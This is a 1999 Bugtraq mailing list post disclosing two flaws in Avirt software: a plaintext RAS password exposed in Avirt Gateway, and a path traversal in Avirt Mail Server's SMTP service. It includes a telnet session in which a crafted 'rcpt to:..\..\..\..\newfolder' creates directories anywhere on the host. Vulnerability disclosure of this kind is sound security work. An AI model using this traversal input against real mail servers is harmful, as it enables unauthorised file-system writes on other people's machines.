Bugtraq mailing list archives

Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability

From: aguileta () EUNATE NET (Jesús López de Aguileta)
Date: Tue, 2 Nov 1999 16:12:41 +0100


----- Original Message -----
From: Luciano Martins <luck () USSRBACK COM>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Monday, November 01, 1999 9:57 AM
Subject: Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow
vulnerability

Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow
vulnerability


I post another 2 bugs concerning Avirt Gateway and Avirt Mail Server 3.3 and
3.5 in BUGTRAQ-ES a month ago. I will try (excuse my poor English) to
translate this message here.

1) Anybody with console access could retrieve RAS password in Avirt Gateway.

Changing the username in "Internet connection" properties and pressing
"test" button makes Avirt to present a message box  with the password in
plaintext.

2) Anybody on the Intranet could make directories anywhere in the NT running
Avirt Mail Server.

telnet 192.168.0.1 25

220 server aVirt Mail SMTP Server Ready.

 mail from:foo

250 foo, Sender OK

 rcpt to:..\..\..\..\newfolder

250 ..\..\..\..\newfolder, Receipient OK

 data

354 Please enter mail, ending with a "." on a line by itself

 Textinside
 .

250 Mail accepted.


This will create a root folder named "newfolder" with a file inside it.
Fortunately it appears to be impossible to overwrite an existing directory.

Avirt has been notified about this security flaws on 23/8/99

Regards

JesĂşs LĂłpez de Aguileta
EunateNet

Current thread:

Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability Luciano Martins (Nov 01)
- Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability Jesús López de Aguileta (Nov 02)